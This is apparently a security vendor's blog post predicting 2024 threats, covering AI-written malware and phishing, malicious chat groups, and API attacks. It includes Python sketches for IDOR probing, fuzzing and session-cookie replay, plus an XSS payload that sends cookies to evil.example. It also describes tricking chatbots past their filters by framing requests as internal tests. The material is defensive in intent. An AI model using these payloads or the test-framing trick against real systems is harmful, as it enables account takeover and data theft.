Cybersecurity Predictions: Generative AI, Chat Services Will Assist with Sneak Attacks
Jamie Moles
January 3, 2024
In 2024, cybersecurity practitioners should watch out for three emerging tactics threat actors are likely to take to try to sneak up on organizations:
- Attackers will increasingly turn to AI to write malware and phishing messages.
- Threat actors will deploy rogue chat programs to deliver malicious code and steal data.
- Attackers will target APIs in an effort to steal the data transmitted between applications.
A recent webinar from ExtraHop and Dark Reading featured a presentation about these three cybersecurity trends. Here are the highlights from the webinar:
Attackers Embrace AI
As many legitimate organizations begin to embrace generative AI, attackers are also experimenting with ways to use it. Shortly after ChatGPT was released in late 2022, users found ways to do all kinds of dodgy things with it. Several users demonstrated how to use ChatGPT to write new kinds of malware, including mutating code designed to evade endpoint detection and response (EDR) systems.
In the following months, ChatGPT and other popular generative AI services put filters in place to prevent users from directing them to write malware and assist with other malicious activity.
However, ChatGPT and other generative AI services can be tricked into writing attacker tools. If you ask ChatGPT to write a script to test your company’s servers for a specific vulnerability, it may comply. Attackers could use that same code.
Beyond mainstream generative AI tools like ChatGPT, threat actors also have access to several other AI applications available on the dark web for a price. These AIs, including WormGPT, have no guardrails in place to prevent threat actors from using them to write solid malware code and other hacking tools.
Attackers will also use AI to automate tasks like writing phishing emails and smishing texts. With AI, attackers can generate highly personalized phishing emails and fraudulent SMS messages, without the frequent spelling and grammatical errors that have exposed many past phishing and smishing attempts.
As with writing malware, commonly used AIs like ChatGPT and Google Bard will decline to write a phishing email, but clever attackers can work around the controls in place. If you ask ChatGPT to write an email to test your company’s anti-phishing policies, the AI will produce credible text.
Chatting with the Bad Guys
Chat server and service abuse is another type of attack that will likely grow in popularity in 2024. These attacks start with an email, text, or social media message to a victim, inviting them to join a chat group, such as a Slack channel or a Discord server.
The group chats may look legitimate and innocuous, but they can lead to serious security problems, since chat services allow users to share files, including Microsoft Word documents containing malicious macros. Moreover, browser-based chat apps slip past organizations' perimeter controls, such as firewalls, which typically allow most web traffic through. This gives attackers largely unchecked access to people inside your corporate network.
In addition to allowing users to share files, chat apps typically enable users to send direct messages to each other, making it easier for attackers to engage in social engineering schemes. Chat services connected to social media sites may also ask for usernames and passwords, giving attackers a means to compromise even more information and potentially elevate their privileges.
In many cases, a good antivirus application or EDR platform will alert security teams to known malware passed through chat apps. However, attackers are constantly looking for ways to evade EDR and antivirus protections, and new or obfuscated malware may slip through.
Organizations need post-compromise protections, including network-based detection capabilities, to protect against chat-based malware.
APIs in the Crosshairs
Finally, threat actors will target vulnerabilities in APIs as a way to steal data. In some cases, APIs transmit user data, such as usernames and passwords, in plain text as users log into web-based applications. And when a website exposes a user's ID number, attackers can often extrapolate other users' ID numbers and use them to access those accounts.
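To make the ID-extrapolation risk concrete, here is a minimal Python sketch of the kind of check a tester might run against their own API. The endpoint, parameter names, and token are hypothetical; the point is simply that if record IDs are sequential and the API does not verify ownership, neighboring IDs can be read by anyone with a valid session.

```python
# Hypothetical check for insecure direct object references (IDOR):
# authenticate as one low-privilege test account, then request records
# belonging to neighboring ID numbers and flag any that come back readable.
import requests

BASE_URL = "https://api.example.com/v1/users"   # hypothetical endpoint
MY_USER_ID = 1042                                # ID of the test account
SESSION_TOKEN = "REPLACE_WITH_TEST_TOKEN"        # token for the test account only

headers = {"Authorization": f"Bearer {SESSION_TOKEN}"}

for candidate_id in range(MY_USER_ID - 5, MY_USER_ID + 6):
    if candidate_id == MY_USER_ID:
        continue  # skip the record we are allowed to see
    resp = requests.get(f"{BASE_URL}/{candidate_id}", headers=headers, timeout=10)
    if resp.status_code == 200:
        # A 200 for someone else's ID means the API is not checking ownership.
        print(f"Possible IDOR: record {candidate_id} is readable "
              f"({len(resp.text)} bytes returned)")
```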
APIs are vulnerable to several types of attack, and a number of powerful tools on the market allow both organizations and attackers to probe APIs for weaknesses.
One common API attack involves "fuzzing," in which a threat actor sends increasingly large garbage strings to a website or API in place of the data it expects. Fuzzing can trigger buffer overflows and other unhandled errors, potentially causing APIs to crash or expose sensitive data.
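As an illustration of the "increasingly large garbage strings" idea, here is a minimal fuzzing sketch in Python. The endpoint and parameter name are hypothetical, and this is only a sketch of the concept, not a full fuzzer: it sends progressively larger junk input to a single field and watches for server errors, the same signal an attacker, or a defender testing their own API, would look for.

```python
# Minimal fuzzing sketch: send progressively larger junk strings to one
# API parameter and record any response that suggests the server choked.
import requests

TARGET = "https://api.example.com/v1/search"   # hypothetical endpoint
PARAM = "query"                                 # hypothetical parameter to fuzz

for size in (100, 1_000, 10_000, 100_000, 1_000_000):
    payload = "A" * size                        # oversized garbage input
    try:
        resp = requests.post(TARGET, json={PARAM: payload}, timeout=15)
    except requests.RequestException as exc:
        print(f"{size:>9} bytes -> connection error: {exc}")
        continue
    if resp.status_code >= 500:
        # 5xx errors often mean the API failed to validate input and may be
        # leaking stack traces or other internal state in its response.
        print(f"{size:>9} bytes -> suspicious response {resp.status_code}")
    else:
        print(f"{size:>9} bytes -> handled cleanly ({resp.status_code})")
```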
Meanwhile, API-related authentication breaches can happen when websites rely on weak authentication methods, such as usernames and passwords alone, or when they store a session ID in a cookie that attackers can steal and then replay to log in as the victim.
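The session-cookie risk is easy to demonstrate: if a site identifies users by nothing more than a session ID stored in a cookie, anyone who obtains that value can present it and be treated as the victim. The sketch below (the URL and cookie name are hypothetical) shows the replay in Python; marking cookies HttpOnly, Secure, and SameSite, and binding sessions to additional signals, makes this kind of theft harder to exploit.

```python
# Sketch of a session-replay test: present a captured session ID and see
# whether the application accepts it as a logged-in user with no other checks.
import requests

ACCOUNT_PAGE = "https://app.example.com/account"   # hypothetical protected page
STOLEN_SESSION_ID = "captured-session-id-value"    # value obtained elsewhere

# No username or password is supplied; the cookie alone carries the identity.
resp = requests.get(
    ACCOUNT_PAGE,
    cookies={"sessionid": STOLEN_SESSION_ID},      # hypothetical cookie name
    timeout=10,
)

if resp.status_code == 200 and "Sign in" not in resp.text:
    print("Session accepted: the cookie alone was enough to authenticate.")
else:
    print("Session rejected or expired.")
```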
Other common attacks against APIs and connected websites include cross-site scripting, server-side request forgery, and SQL injection. Cross-site scripting, for example, involves an attacker injecting malicious scripts into the code of a trusted website or application.
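To illustrate the injection point, here is a minimal Python sketch (no real site implied) that builds an HTML page from a user-supplied search term. The first version reflects the input verbatim, so a value containing a script tag executes in the visitor's browser; the second escapes the input before it reaches the page, which is the standard defense.

```python
# Minimal illustration of reflected cross-site scripting and its fix.
from html import escape

user_input = '<script>document.location="https://evil.example/?c="+document.cookie</script>'

# Vulnerable: the untrusted value is dropped straight into the HTML,
# so the browser parses and executes the injected <script> element.
vulnerable_page = f"<h1>Results for {user_input}</h1>"

# Safer: escaping converts < > " ' & into entities, so the payload is
# displayed as text instead of being executed.
safe_page = f"<h1>Results for {escape(user_input)}</h1>"

print(vulnerable_page)
print(safe_page)
```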
Reveal(x) to the Rescue
Regardless of which tactic attackers may employ, the ExtraHop Reveal(x) network detection and response platform can help organizations pick up on it. If an attacker manages to get onto your network using new AI-generated malware, by compromising a chat service, or by exploiting vulnerabilities in APIs, Reveal(x) can show you their attempts to move laterally inside the network, conduct reconnaissance, and steal data. It also detects cross-site scripting, server-side request forgery, and SQL injection, among hundreds of other attack techniques. Learn more via our on-demand webinar or self-guided demo.
Share your cybersecurity predictions for 2024 in the ExtraHop Customer Community.